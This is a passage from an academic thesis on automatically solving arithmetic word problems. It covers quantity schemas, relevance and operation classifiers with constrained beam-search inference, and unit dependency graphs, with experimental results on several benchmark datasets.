constraints. The inference algorithm now becomes the following: arg max E∈C Score(E) (6.4) The space of possible expressions is large, and we employ a beam search strategy to find the highest scoring constraint satisfying expression [Chang et al., 2012]. We construct an expression tree using a bottom up approach, first enumerating all possible sets of irrelevant quantities, and next over all possible expressions, keeping the top k at each step. We give details below. 1. Enumerating Irrelevant Quantities: We generate a state for all possible sets of irrelevant quantities, ensuring that there is at least two relevant quantities in each state. We refer to each of the relevant quantities in each state as a term. Therefore, each state can be represented as a set of terms. 2. Enumerating Expressions: For generating a next state S′ from S, we choose a pair of terms ti and tj in S and one of the four basic operations, and form a new term by combining terms ti and tj with the operation. Since we do not know which of the possible next states will lead to the optimal 59 goal state, we enumerate all possible next states (that is, enumerate all possible pairs of terms and all possible operations); we prune the beam to keep only the top k candidates. We terminate when all the states in the beam have exactly one term. Once we have a top k list of candidate expression trees, we choose the highest scoring tree which satisfies the constraints. However, there might not be any tree in the beam which satisfies the constraints, in which case, we choose the top candidate in the beam. We use k = 200 in our experiments. In order to choose the value for the wIrr, we search over the set {10−6, 10−4, 10−2, 1, 102, 104, 106}, and choose the parameter setting which gives the highest accuracy on the training data. 6.4.2 Quantity Schema In order to generalize across problem types as well as over simple manipulations of the text, it is necessary to train our system only with relevant information from the problem text. E.g., for the problem in example 6.2, we do not want to take decisions based on how Tom earned money. Therefore, there is a need to extract the relevant information from the problem text. To this end, we introduce the concept of a quantity schema which we extract for each quantity in the problem’s text. Along with the question asked, the quantity schemas provides all the information needed to solve most arithmetic problems. A quantity schema for a quantity q in problem P consists of the following components. 1. Associated Verb For each quantity q, we detect the verb associated with it. We traverse up the dependency tree starting from the quantity mention, and choose the first verb we reach. We used the easy first dependency parser [Goldberg and Elhadad, 2010]. 2. Subject of Associated Verb We detect the noun phrase, which acts as subject of the associated verb (if one exists). 3. Unit We use a shallow parser to detect the phrase p in which the quantity q is mentioned. All tokens of the phrase (other than the number itself) are considered as unit tokens. Also, if p is followed by the prepositional phrase “of” and a noun phrase (according to the shallow parser annotations), we also consider tokens from this second noun phrase as unit tokens. Finally, if no unit token can be extracted, we assign the unit of the neighboring quantities as the unit of q (following previous work [Hosseini et al., 2014]). 4. Related Noun Phrases We consider all noun phrases which are connected to the phrase p containing 60 quantity q, with NP-PP-NP attachment. If only one quantity is mentioned in a sentence, we consider all noun phrases in it as related. 5. Rate We determine whether quantity q refers to a rate in the text, as well as extract two unit compo- nents defining the rate. For example, “7 kilometers per hour” has two components “kilometers” and “hour”. Similarly, for sentences describing unit cost like “Each egg costs 2 dollars”, “2” is a rate, with units “dollars” and “egg”. In addition to extracting the quantity schemas for each quantity, we extract the surface form text which poses the question. For example, in the question sentence, “How much will John have to pay if he wants to buy 7 oranges?”, our extractor outputs “How much will John have to pay” as the question. 6.4.3 Relevance Classifier We train a binary SVM classifier to determine, given problem text P and a quantity q in it, whether q is needed in the numeric expression generating the solution. We train on gold annotations and use the score of the classifier as the scoring function Irr(·). Features The features are extracted from the quantity schemas and can be broadly categorized into three groups: 1. Unit features: Most questions specifically mention the object whose amount needs to be computed, and hence questions provide valuable clue as to which quantities can be irrelevant. We add a feature for whether the unit of quantity q is present in the question tokens. Also, we add a feature based on whether the units of other quantities have better matches with question tokens (based on the number of tokens matched), and one based on the number of quantities which have the maximum number of matches with the question tokens. 2. Related NP features: Often units are not enough to differentiate between relevant and irrelevant quantities. Consider the following: Example 6.3 Problem : There are 8 apples in a pile on the desk. Each apple comes in a package of 11. 5 apples are added to the pile. How many apples are there in the pile? Solution : (8 + 5) = 13 61 The relevance decision depends on the noun phrase “the pile”, which is absent in the second sentence. We add a feature indicating whether a related noun phrase is present in the question. Also, we add a feature based on whether the related noun phrases of other quantities have better match with the question. Extraction of related noun phrases is described in Section 6.4.2. 3. Miscellaneous Features: When a problem mentions only two quantities, both of them are usually relevant. Hence, we also add a feature based on the number of quantities mentioned in text. We include pairwise conjunction of the above features. 6.4.4 LCA Operation Classifier In order to predict LCA operations, we train a multiclass SVM classifier. Given problem text P and a pair of quantities pi and pj, the classifier predicts one of the six labels described in Eq. 6.2. We consider the confidence scores for each label supplied by the classifier as the scoring function Pair(·). Features We use the following categories of features: 1. Individual Quantity features: Dependent verbs have been shown to play significant role in solving addition and subtraction problems [Hosseini et al., 2014]. Hence, we add the dependent verb of the quantity as a feature. Multiplication and division problems are largely dependent on rates described in text. To capture that, we add a feature based on whether the quantity is a rate, and whether any component of rate unit is present in the question. In addition to these quantity schema features, we add selected tokens from the neighborhood of the quantity mention. Neighborhood of quantities are often highly informative of LCA operations, for example, “He got 80 more marbles”, the term “more” usually indicates addition. We add as features adverbs and comparative adjectives mentioned in a window of size 5 around the quantity mention. 2. Quantity Pair features: For a pair (qi,qj) we add features to indicate whether they have the same dependent verbs, to indicate whether both dependent verbs refer to the same verb mention, whether the units of qi and qj are the same and, if one of them is a rate, which component of the unit matches with the other quantity’s unit. Finally, we add a feature indicating whether the value of qi is greater than the value of qj. 62 3. Question Features: Finally, we add a few features based on the question asked. In particular, for arithmetic problems where only one operation is needed, the question contains signals for the required operation. Specifically, we add indicator features based on whether the question mentions comparison- related tokens (e.g., “more”, “less” or “than”), or whether the question asks for a rate (indicated by tokens such as “each” or “one”). We include pairwise conjunction of the above features. For both classifiers, we use the Illinois-SL package 1 under default settings. 6.5 Experimental Results AI2 IL CC Relax Strict Relax Strict Relax Strict All features 88.7 85.1 75.7 75.7 60.0 25.8 No Individual Quantity features 73.6 67.6 52.0 52.0 29.2 0.0 No Quantity Pair features 83.2 79.8 63.6 63.6 49.3 16.5 No Question features 86.8 83.9 73.3 73.3 60.5 28.3 Table 6.1: Performance of LCA Operation classifier on the datasets AI2, IL and CC. In this section, we evaluate the proposed method on publicly available datasets of arithmetic word problems. We evaluate separately the relevance and LCA operation classifiers, and show the contribution of various features. Lastly, we evaluate the performance of the full system, and quantify the gains achieved by the constraints. 6.5.1 Datasets We evaluate our system on three datasets, each of which comprise a different category of arithmetic word problems. 1. AI2 Dataset: This is a collection of 395 addition and subtraction problems, released by [Hosseini et al., 2014]. They performed a 3-fold cross validation, with every fold containing problems 1 http://cogcomp.cs.illinois.edu/page/software view/Illinois-SL 63 from different sources. This helped them evaluate robustness to domain diversity. We follow the same evaluation setting. 2. IL Dataset: This is a collection of arithmetic problems released by [Roy et al., 2015]. Each of these problems can be solved by performing one operation. However, there are multiple problems having the same template. To counter this, we perform a few modifications to the dataset. First, for each problem, we replace the numbers and nouns with the part of speech tags, and then we cluster the problems based on unigrams and bigrams from this modified problem text. In particular, we cluster problems together whose unigram-bigram similarity is over 90%. We next prune each cluster to keep at most 5 problems in each cluster. Finally we create the folds ensuring all problems in a cluster are assigned to the same fold, and each fold has similar distribution of all operations. We have a final set of 562 problems, and we use a 5-fold cross validation to evaluate on this dataset. 3. Commoncore Dataset: In order to test our system’s ability to handle multi-step problems, we create a new dataset of multi-step arithmetic problems. The problems were extracted from www.commoncoresheets.com. In total, there were 600 problems, 100 for each of the following types: (a) Addition followed by Subtraction (b) Subtraction followed by Addition (c) Addition and Multiplication (d) Addition and Division (e) Subtraction and Multiplication (f) Subtraction and Division This dataset had no irrelevant quantities. Therefore, we did not use the relevance classifier in our evaluations. In order to test our system’s ability to generalize across problem types, we perform a 6-fold cross validation, with each fold containing all the problems from one of the aforementioned categories. This is a more challenging setting relative to the individual data sets mentioned above, since we are evaluating on multi-step problems, without ever looking at problems which require the same set of operations. 64 6.5.2 Relevance Classifier Table 6.2 evaluates the performance of the relevance classifier on the AI2 and IL datasets. We report two accuracy values: Relax - fraction of quantities which the classifier got correct, and Strict - fraction of math problems, for which all quantities were correctly classified. We report accuracy using all features and then removing each feature group, one at a time. AI2 IL Relax Strict Relax Strict All features 94.7 89.1 95.4 93.2 No Unit features 88.9 71.5 92.8 91.0 No NP features 94.9 89.6 95.0 91.2 No Misc. features 92.0 85.9 93.7 89.8 Table 6.2: Performance of Relevance classifier on the datasets AI2 and IL. We see that features related to units of quantities play the most significant role in determining relevance of quantities. Also, the related NP features are not helpful for the AI2 dataset. 6.5.3 LCA Operation Classifier Table 6.1 evaluates the performance of the LCA Operation classifier on the AI2, IL and CC datasets. As before, we report two accuracies - Relax - fraction of quantity pairs for which the classifier correctly predicted the LCA operation, and Strict - fraction of math problems, for which all quantity pairs were correctly classified. We report accuracy using all features and then removing each feature group, one at a time. The strict and relaxed accuracies for IL dataset are identical, since each problem in IL dataset only requires one operation. The features related to individual quantities are most significant; in particular, the accuracy goes to 0.0 in the CC dataset, without using individual quantity features. The question features are not helpful for classification in the CC dataset. This can be attributed to the fact that all problems in CC dataset require multiple operations, and questions in multi-step problems usually do not contain information for each of the required operations. 65 6.5.4 Global Inference Module Table 6.3 shows the performance of our system in correctly solving arithmetic word problems. We show the impact of various constraints, and also compare against previously best known results on the AI2 and IL datasets. We also show results using each of the two constraints separately, and using no constraints at all. AI2 IL CC All constraints 72.0 73.9 45.2 Positive constraint 78.0 72.5 36.5 Integral constraint 71.8 73.4 39.0 No constraint 77.7 71.9 29.6 [Hosseini et al., 2014] 77.7 - - [Roy et al., 2015] - 52.7 - [Kushman et al., 2014] 64.0 73.7 2.3 Table 6.3: Accuracy in correctly solving arithmetic problems. First four rows represent various configurations of our system. We achieve state of the art results in both AI2 and IL datasets. The previously known best result in the AI2 dataset is reported in [Hosseini et al., 2014]. Since we fol- low the exact same evaluation settings, our results are directly comparable. We achieve state of the art results, without having access to any additional annotated data, unlike [Hosseini et al., 2014], who use labeled data for verb categorization. For the IL dataset, we acquired the system of [Roy et al., 2015] from the authors, and ran it with the same fold information. We outperform their system by an ab- solute gain of over 20%. We believe that the improvement was mainly due to the dependence of the system of [Roy et al., 2015] on lexical and neighborhood of quantity features. In contrast, features from quantity schemas help us generalize across problem types. Finally, we also compare against the template based system of [Kushman et al., 2014]. [Hosseini et al., 2014] mentions the result of running the system of [Kushman et al., 2014] on AI2 dataset, and we report their result here. For IL and CC datasets, we used the system released by [Kushman et al., 2014]. The integrality constraint is particularly helpful when division is involved, since it can lead to fractional answers. It does not help in case of the AI2 dataset, which involves only addition and subtraction problems. The role of the constraints becomes more significant in case of multi-step problems and, in particular, they contribute an absolute improvement of over 15% over the system without constraints on the CC dataset. 66 The template based system of [Kushman et al., 2014] performs on par with our system on the IL dataset. We believe that it is due to the small number of equation templates in the IL dataset. It performs poorly on the CC dataset, since we evaluate on unseen problem types, which do not ensure that equation templates in the test data will be seen in the training data. 6.5.5 Discussion The leading source of errors for the classifiers are erroneous quantity schema extraction and lack of under- standing of unknown or rare verbs. For the relevance classifier on the AI2 dataset, 25% of the errors were due to mistakes in extracting the quantity schemas and 20% could be attributed to rare verbs. For the LCA operation classifier on the same dataset, 16% of the errors were due to unknown verbs and 15% were due to mistakes in extracting the schemas. The erroneous extraction of accurate quantity schemas is very significant for the IL dataset, contributing 57% of the errors for the relevance classifier and 39% of the errors for the LCA operation classifier. For the operation classifier on the CC dataset, 8% of the errors were due to verbs and 16% were due to faulty quantity schema extraction. Quantity Schema extraction is challenging due to parsing issues as well as some non-standard rate patterns, and it will be one of the future work targets. For example, in the sentence, “How many 4-dollar toys can he buy?”, we fail to extract the rate component of the quantity 4. 6.6 Conclusion In this chapter, we present a novel method for understanding and solving a general class of arithmetic word problems. Our approach can solve all problems whose solution can be expressed by a read-once arithmetic expression, where each quantity from the problem text appears at most once in the expression. We de- velop a novel theoretical framework, centered around the notion of monotone expression trees, and showed how this representation can be used to get a unique decomposition of the problem. This theory natu- rally leads to a computational solution that we have shown to uniquely determine the solution - determine the arithmetic operation between any two quantities identified in the text. This theory underlies our al- gorithmic solution - we develop classifiers and a constrained inference approach that exploits redundancy in the information, and show that this yields strong performance on several benchmark collections. In particular, our approach achieves state of the art performance on two publicly available arithmetic prob- lem datasets and can support natural generalizations for quantitative reasoning over multiple quantities 67 in text. Specifically, our approach performs competitively on multistep problems, even when it has never observed the particular problem type before. The datasets used in this work are available for download at http://cogcomp.cs.illinois.edu/page/resource view/98. 68 Chapter 7 Unit Dependency Graphs 7.1 Introduction Most statistical word problem solvers till now (including the one described in the last chapter) were entirely data-driven. They depend on training examples to learn all the concepts needed for math word problem solving. However, often domain knowledge is needed for quantitative reasoning, which is not easy to learn from training data. Dimensional analysis is an example of this kind of domain knowledge. Applying the knowledge of dimensional analysis to the units of quantities can inform several quantitative inferences as exemplified below. Let us look at the arithmetic word problem in Example 7.1. The units of “66” and “10” are both “flowers”, which indicate they can be added or subtracted. Although unit of “8” is also “flower”, it is associated with a rate, indicating the number of flowers in each bouquet. As a result, “8” effectively has unit “flowers per bouquet”. Detecting such rate units and applying dimensional analysis help understand that “8” will more likely be multiplied or divided to arrive at the solution. Finally, the question asks for the number of “bouquets”, indicating “8” will likely be divided, and not multiplied. Knowing such interactions could help understand the situation and perform better quantitative reasoning. In addition, given that unit extraction is a noisy process, this can make it more robust via global reasoning. This is exactly the focus of this chapter – to integrate domain knowledge about dimensional analysis into statistical methods for word problem solving. Example 7.1 Isabel picked 66 flowers for her friends wedding. She was making bouquets with 8 flowers in each one. If 10 of the flowers wilted before the wedding, how many bouquets could she still make? We introduce the concept of unit dependency graph (UDG) for math word problems, to represent the re- lationships among the units of different numbers, and the question being asked. We also introduce a strategy 69 to extract annotations for unit dependency graphs, with minimal additional annotations. In particular, we use the answers to math problems, along with the rate annotations for a few selected problems, to generate complete annotations for unit dependency graphs. Finally, we develop a decomposed model to predict UDG given an input math word problem. We augment the arithmetic word problem solver of [Roy and Roth, 2015] to predict a unit dependency graph, along with the solution expression of the input arithmetic word problem. Forcing the solver to respect the dependencies of the unit dependency graph enables us to improve unit extractions, as well as leverage the domain knowledge about unit dependencies in math reasoning. The introduction of unit dependency graphs reduced the error of the solver by over 10%, while also making it more robust to reduction in lexical and template overlap of the dataset. 7.2 Unit Dependency Graph We first introduce the idea of a generalized rate, and its unit representation. We define rate to be any quantity which is some measure corresponding to one unit of some other quantity. This includes explicit rates like “40 miles per hour”, as well as implicit rates like the one in “Each student has 3 books”. Consequently, units for rate quantities take the form “A per B”, where A and B refer to different entities. We refer to A as Num Unit (short for Numerator Unit), and B as Den Unit (short for denominator unit). Table 7.1 shows examples of Num and Den Units for various rate mentions. Mention Num Unit Den Unit 40 miles per hour mile hour Each student has 3 books. book student Table 7.1: Units of rate quantities A unit dependency graph (UDG) of a math word problem is a graph representing the relations among quantity units and the question asked. Fig. 7.1 shows an example of a math word problem and its unit dependency graph. For each quantity mentioned in the problem, there exists a vertex in the unit dependency graph. In addition, there is also a vertex representing the question asked. Therefore, if a math problem mentions n quantities, its unit dependency graph will have n + 1 vertices. In the example in Fig 7.1, there is one vertex corresponding to each of the quantities 66, 8 and 10, and one vertex representing the question part “how many bouquets could she still make ?”. 70 Problem Isabel picked 66 flowers for her friends wedding. She was making bouquets with 8 flowers in each one. If 10 of the flowers wilted before the wedding, how many bouquets could she still make? Unit Dependency Graph 66 8 10how many bouquets Rate Num Unit Den Unit Num Unit Same Unit Expression Tree of Solution 66 − 10 ÷ 8 Figure 7.1: An arithmetic word problem, its UDG, and a tree representation of the solution (66 − 10)/8. Several dependencies exist between the UDG and the final solution of a problem. Here, “66” and “10” are connected via Same Unit edge, hence they can be added or subtracted, “8” is connected by Den Unit to the question, indicating that some expression will be divided by “8” to get the answer’s unit. A vertex representing a number, is labeled Rate, if the corresponding quantity describes a rate relation- ship (according to the aforementioned definition). In fig 7.1, “8” is labeled as a Rate since it indicates the number of flowers in each bouquet. Similarly, a vertex corresponding to the question is marked Rate if the question asks for a rate. Edges of a UDG can be directed as well as undirected. Each undirected edge has the label Same Unit, indicating that the connected vertices have the same unit. Each directed edge going from vertex u to vertex v can have one of the following labels: 1. Num Unit : Valid only for directed edges with source vertex u labeled as Rate, indicates that Num Unit of u matches the unit of the destination vertex v. 2. Den Unit : Valid only for directed edges with source vertex labeled as Rate, indicates that Den Unit of source vertex u matches the unit of the destination vertex v. If no edge exists between a pair of vertices, they have unrelated units. Several dependencies exist between the vertex and edge labels of the unit dependency graph of a problem, 71 and its solution expression. Sec 7.4.4 discusses these dependencies and how they can be leveraged to improve math problem solving. 7.3 Learning to Predict UDGs Predicting UDG for a math word problem is essentially a structured prediction problem. However, since we have limited training data, we develop a decomposed model to predict parts of the structure inde- pendently, and then perform joint inference to enforce coherent predictions. This has been shown to be an effective method for structured prediction in the presence of limited data [Punyakanok et al., 2005b, Sutton and McCallum, 2007]. Empirically, we found our decomposed model to be superior to jointly trained alternatives (see Section 7.5). Our decomposed model for UDG prediction uses the following two classifiers. 1. Vertex Classifier : This is a binary classifier, which takes a vertex of the UDG as input, and decides whether it denotes a rate. 2. Edge Classifier : This is a multiclass classifier, which takes as input a pair of nodes of the UDG, and predicts the properties of the edge connecting those nodes. Finally, a constrained inference module combines the output of the two classifiers to construct a UDG. We provide details of the components in the following subsections. 7.3.1 Vertex Classifier In order to detect rate quantities, we train a binary classifier. Given problem text P and a vertex v of the UDG, the classifier predicts whether v represents a rate. It predicts one of two labels - Rate or Not Rate. The vertex v is either a quantity mentioned in P , or the question of P . The features used for the classification are as follows : 1. Context Features: We add unigrams, bigrams, part of speech tags, and their conjunctions from the neighborhood of v. 2. Rule based Extraction Features: We add a feature indicating whether a rule based approach can detect v as a rate. 72 7.3.2 Edge Classifier We train a multiclass classifier to determine the properties of the edges of the UDG. Given problem text P and a pair of vertices vi and vj (i < j), the classifier predicts one of the six labels : 1. Same Unit : Indicates that vi and vj should be connected by an undirected edge labeled Same Unit. 2. No Relation : Indicates no edge exists between vi and vj. 3. Rate→Num : Indicates that vi is a rate, and the Num Unit of vi matches the unit of vj. 4. Rate←Num : Indicates that vj is a rate, and the Num Unit of vj matches the unit of vi. 5. We similarly define Rate→Den and Rate ← Den. The features used for the classification are : 1. Context Features: For each vertex v in the query, we add the context features described for Vertex classifier. 2. Rule based Extraction Features: We add a feature indicating whether each of the queried vertices is detected as a rate by the rule based system. In addition, we also add features denoting whether there are common tokens in the units of vi and vj. 7.3.3 Constrained Inference Our constrained inference module takes the scores of the Vertex and Edge classifiers, and combines them to find the most probable unit dependency graph for a problem. We define Vertex(v,l) to be the score predicted by the Vertex classifier for labeling vertex v of a UDG with label l, where l ∈{Rate,Not Rate}. Similarly, we define Edge(vi,vj, l) to be the score predicted by the Edge classifier for the assignment of label l to the edge between vi and vj. Here the label l is one of the six labels defined for the edge classifier. Let G be a UDG with vertex set V . We define the score for G as follows: Score(G) = ∑ v∈V Label(G,v)=Rate Vertex(v,Rate) + λ× ∑ vi,vj∈V,i<j Edge(vi,vj,Label(G,vi,vj)) where λ is a scaling factor, and Label maps labels of the UDG, to the labels of the corresponding classifiers. Label(G,v) maps to Rate, if v is a rate, otherwise it maps to Not Rate. Similarly, if no edge exists 73 between vi and vj, Label(G,vi,vj) maps to No Relation, if Num Unit of vi matches the unit of vj, Label(G,vi,vj) maps to Rate → Num, and so on. Finally, the inference problem has the following form: arg max G∈Graphs Score(G) where Graphs is the set of all valid unit dependency graphs for the input problem. 7.4 Joint Inference With An Arithmetic Solver In this section, we describe our joint inference procedure to predict both a UDG and the solution of an input arithmetic word problem. Our model is built on the arithmetic word problem solver of [Roy and Roth, 2015], and we briefly describe it in the following sections. We first describe the concept of expression trees, and next describe the solver, which leverages expression tree representation of the solutions. 7.4.1 Monotonic Expression Tree An expression tree is a binary tree representation of a mathematical expression, where leaves represent numbers, and all non-leaf nodes represent operations. Fig 7.1 shows an example of an arithmetic word problem and the expression tree of the solution mathematical expression. A monotonic expression tree is a normalized expression tree representation for math expressions, which restricts the order of combination of addition and subtraction nodes, and multiplication and division nodes. The expression tree in Fig 7.1 is monotonic. 7.4.2 Arithmetic Word Problem Solver We now describe the solver pipeline of [Roy and Roth, 2015]. Given a problem P with quantities q1,q2, . . . ,qn, the solver uses the following two classifiers. 1. Irrelevance Classifier : Given as input, problem P and quantity qi mentioned in P , the classifier decides whether qi is irrelevant for the solution. The score of this classifier is denoted as Irr(q). 2. LCA Operation Classsifier : Given as input, problem P and a pair of quantities qi and qj (i < j), the classifier predicts the operation at the lowest common ancestor (LCA) node of qi and qj, in the solution expression tree of problem P. The set of possible operations are +, −, −r, ×, ÷ and ÷r (the subscript r indicates reverse order). Considering only monotonic expression trees for the solution 74 makes this operation unique for any pair of quantities. The score of this classifier for operation o is denoted as LCA(qi,qj,o). The above classifiers are used to gather irrelevance scores for each number, and LCA operation scores for each pair of numbers. Finally, constrained inference procedure combines these scores to generate the solution expression tree. Let I(T) be the set of all quantities in P which are not used in expression tree T, and λIrr be a scaling parameter. The score Score(T) of an expression tree T is defined as: Score(T) = λIrr ∑ q∈I(T ) Irr(q) + ∑ qi,qj /∈I(T ) LCA(qi,qj,�LCA(qi,qj,T)) where �LCA(qi,qj,T) denotes the operation at the lowest common ancestor node of qi and qj in monotonic expression tree T . Let Trees be the set of valid expressions that can be formed using the quantities in a problem P , and also give positive solutions. The inference algorithm now becomes: arg max T∈Trees Score(T) 7.4.3 Joint Inference We combine the scoring functions of UDG prediction and the ones from the solver of [Roy and Roth, 2015], so that we can jointly predict the UDG and the solution of the problem. For an input arithmetic word problem P , we score tuples (G,T) (where G is a candidate UDG for P , and T is a candidate solution expression tree of P) as follows : Score(G,T) =λIrr ∑ q∈I(T ) Irr(q) + ∑ qi,qj /∈I(T ) LCA(qi,qj,�LCA(qi,qj,T))+ λVertex ∑ v∈V Label(G,v)=Rate Vertex(v,Rate) + λEdge ∑ vi,vj∈V,i<j Edge(vi,vj,Label(G,vi,vj)) where λIrr, λVertex and λEdge are scaling parameters. This is simply a scaled addition of the scores for UDG prediction and solution expression generation. Finally, the inference problem is arg max (G,T )∈Tuples Score(G,T) 75 where Tuples is the set of all tuples (G,T), such that G ∈ Graphs, T ∈ Trees, and G is a consistent UDG for the solution tree T. 7.4.4 Consistent Rate Unit Graphs We have a set of conditions to check whether G is a consistent UDG for monotonic tree T . Most of these conditions are expressed in terms of Path(T,vi,vj), which takes as input a pair of vertices vi,vj of the UDG G, and a monotonic expression tree T , and returns the following. 1. If both vi and vj are numbers, and their corresponding leaf nodes in T are ni and nj respectively, then it returns the nodes in the path connecting ni and nj in T. 2. If only vi denotes a number (implying vj represents the question), the function returns the nodes in the path from ni to the root of T, where ni is the corresponding leaf node for vi. For the unit dependency graph and solution tree T of Fig 7.1, Path(T, 66, 8) is {−,÷}, whereas Path(T, 8, question) is {÷}. Finally, the conditions for consistency between a UDG G and an expression tree T are as follows: 1. If vi is the only vertex labeled Rate and it is the question, there should not exist a path from some leaf n to the root of T which has only addition, subtraction nodes. If that exists, it implies n can be added or subtracted to get the answer, that is, the corresponding vertex for n in G has same unit as the question, and should have been labeled Rate. 2. If vi is labeled Rate and the question is not, the path from ni (corresponding leaf node for vi) to the root of T cannot have only addition, subtraction nodes. Otherwise, the question will have same rate units as vi. 3. We also check whether the edge labels are consistent with the vertex labels using Algorithm 5, which computes edge labels of UDGs, given the expression tree T , and vertex labels. It uses heuristics like if a rate r is being multiplied by a non-rate number n, the Den Unit of r should match the unit of n, etc. 76 Algorithm 5 EdgeLabel Input: Monotonic expression tree T , vertex pairs vi,vj, and their corresponding vertex labels Output: Label of edge between vi and vj 1: path ← Path(T,vi,vj) 2: CountMulDiv ← Number of Multiplication and Division nodes in path 3: if vi and vj have same vertex label, and CountMulDiv = 0 then 4: return Same Unit 5: end if 6: if vi and vj have different vertex labels, and CountMulDiv = 1 then 7: if path contains × and vi is Rate then 8: return Rate→Den 9: end if 10: if path contains × and vj is Rate then 11: return Rate←Den 12: end if 13: if path contains ÷ and vi is Rate then 14: return Rate→Num 15: end if 16: if path contains ÷r and vj is Rate then 17: return Rate←Num 18: end if 19: end if 20: return Cannot determine edge label These consistency conditions prevent the inference procedure from considering any inconsistent tuples. They help the solver to get rid of erroneous solutions which involve operations inconsistent with all high scoring UDGs. Finally, in order to find the highest scoring consistent tuple, we have to enumerate the members of Tuples, and score them. The size of Tuples however is exponential in the number of quantities in the problem. As a result, we perform beam search to get the highest scoring tuple. We first enumerate the members of Trees, and next for each member of Trees, we enumerate consistent UDGs. 77 7.5 Experiments In this section, we evaluate our proposed method, and quantify the gains achieved by using UDGs in solving arithmetic word problems. 7.5.1 Dataset We detected several issues in the existing datasets for arithmetic word problem solvers, and how they were used for evaluation. The evaluation in the last chapter was done separately on different types of arithmetic problems. This does not capture how well the systems can distinguish between these different problem types. Datasets released by [Roy and Roth, 2015] and [Koncel-Kedziorski et al., 2015] mention irrelevant quantities in words, and only the relevant quantities are mentioned in digits. This removes the challenge of detecting extraneous quantities. Also, the folds for Commoncore dataset were created in an adverserial manner to force the systems to only test on unseen equation forms. This seems too harsh for template based systems, who search the output space based on previously seen equation forms. In order to address the aforementioned issues, we pooled arithmetic word problems from all available datasets [Hosseini et al., 2014, Roy and Roth, 2015, Koncel-Kedziorski et al., 2015], and normalized all men- tions of quantities to digits. We next prune problems such that there do not exist a problem pair with over 80% match of unigrams and bigrams. The threshold of 80% was decided manually by determining that problems with around 80% overlap are sufficiently different. We finally ended up with 831 problems. We refer to this dataset as AllArith. We also create subsets of AllArith using the MAWPS system [Koncel-Kedziorski et al., 2016]. MAWPS can generate subsets of word problems based on lexical and template overlap. Lexical overlap is a measure of reuse of lexemes among problems in a dataset. High lexeme reuse allows for spurious associations between the problem text and a correct solution [Koncel-Kedziorski et al., 2015]. Evaluating on low lexical overlap subset of the dataset can show the robustness of solvers to lack of spurious associations. Template overlap is a measure of reuse of similar equation templates across the dataset. Several systems focus on solving problems under the assumption that similar equation templates have been seen at training time. Evaluating on low template overlap subset can show the reliance of systems on the reuse of equation templates. We create two subsets of 415 problems each - one with low lexical overlap called AllArithLex, and one with low template overlap called AllArithTmpl. We report random 5-fold cross validation results on all these datasets. For each fold, we choose 20% of the training data as development set, and tune the scaling parameters on this set. Once the parameters are 78 set, we retrain all the models on the entire training data. We use a beam size of 200 in all our experiments. 7.5.2 Data Acquisition In order to learn the classifiers for predicting vertex and edge labels for UDGs, we need annotated data. However, gathering vertex and edge labels for UDGs of problems, can be expensive. In this section, we show that vertex labels for a subset of problems, along with annotations for solution expressions, can be sufficient to gather high quality annotations for vertex and edge labels of UDGs. Given an arithmetic word problem P , annotated with the monotonic expression tree T of the solution expression, we try to acquire annotations for the UDG of P . First, we try to determine the labels for the vertices, and next the edges of the graph. We check if T has any multiplication or division node. If no such node is present, we know that all the numbers in the leaves of T have been combined via addition or subtraction, and hence, none of them describes a rate in terms of the units of other numbers. This determines that none of T ’s leaves is a rate, and also, the question does not ask for a rate. If a multiplication or division node is present in T, we gather annotations for the numbers in the leaves of T as well as the question of P . Annotators were asked to mark whether each number represents a rate relationship, and whether the question in P asks for a rate. This process determines the labels for the vertices of the UDG. Two annotators performed these annotations, with an agreement of 0.94(kappa). Once we have the labels for the vertices of the UDG, we try to infer the labels for the edges using Algorithm 5. When the algorithm is unable to infer the label for a particular edge, we heuristically label that edge to be No Relation. The above process allowed us to extract high quality annotations for UDGs with minimal manual anno- tations. In particular, we only had to annotate vertex labels for 300 problems, out of the 831 problems in AllArith. Obviously some of the extracted No Relation edge labels are noisy; this can be remedied by collecting annotations for these cases. However, in this work, we did not use any manual annotations for edge labels. 79 Features Vertex Classifier Edge Classifier AllArith AllArithLex AllArithTmpl AllArith AllArithLex AllArithTmpl All features 96.7 96.2 97.5 87.1 84.3 86.6 No rule based features 93.2 92.5 92.6 79.3 75.4 78.0 No context fea- tures 95.1 94.1 95.3 78.6 70.3 75.5 Table 7.2: Performance of system components for predicting vertex and edge labels for unit dependency graphs 7.5.3 UDG Prediction Table 7.2 shows the performance of the classifiers and the contribution of each feature type. The results indicate that rule-based techniques are not sufficient for robust extraction, there is a need to take context into account. Table 7.3 shows the performance of our decomposed model (Decompose) in correctly predicting UDGs, as well as the contribution of constraints in the inference procedure. Having explicit constraints for the graph structure provides 3-5% improvement in correct UDG prediction. We also compare against a jointly trained model (Joint), which learns to predict all vertex and edge labels together. Note that Joint also uses the same set of constraints as Decompose in the inference procedure, to ensure it only predicts valid unit dependency graphs. We found that Joint does not outperform Decompose, while taking significantly more time to train. The worse performance of joint learning is due to: (1) search space being too large for the joint model to do well given our relatively small dataset size, and (2) our independent classifiers being good enough, thus supporting better joint inference. This tradeoff is strongly supported in the literature [Punyakanok et al., 2005b, Sutton and McCallum, 2007]. Note, that all these evaluations are based on noisy edges annotations. This was done to reduce further annotation effort. Also, less than 15% of labels were noisy (indicated by fraction of No Relation labels), which makes this evaluation reasonable. 80 AllArith AllArithLex AllArithTmpl Decompose 73.6 67.7 68.7 - constraints 70.9 62.9 65.5 Joint 72.9 66.7 68.4 Table 7.3: Performance in predicting UDGs 7.5.4 Solving Arithmetic Word Problems Here we evaluate the accuracy of our system in correctly solving arithmetic word problems. We refer to our system as UnitDep. We compare against the following systems: 1. LCA++ : System of [Roy and Roth, 2015] with feature set augmented by neighborhood features, and with only positive answer constraint. We found that augmenting the released feature set with context features, and removing the integral answer constraint, were helpful. Our system UnitDep also uses the augmented feature set for Relevance and LCA operation classifiers, and only positive constraint for final solution value. 2. Template : Template based algebra word problem solver of [Kushman et al., 2014]. 3. SingleEq : Single equation word problem solver of [Koncel-Kedziorski et al., 2015]. In order to quantify the gains due to vertex and edge information of UDGs, we also run two variants of UnitDep - one with λVertex = 0, and one with λEdge = 0. Table 7.4 shows the performance of these systems on AllArith, AllArithLex and AllArithTmpl. System AllArith AllArithLex AllArithTmpl Template 73.7 65.5 71.3 SingleEq 60.4 51.5 51.0 LCA++ 79.4 63.6 74.7 UnitDep 81.7 68.9 79.5 λVertex = 0 80.3 67.2 77.1 λEdge = 0 79.9 64.1 75.7 Table 7.4: Performance in solving arithmetic word problems 81 UnitDep outperforms all other systems across all datasets. Setting either λVertex = 0 or λEdge = 0 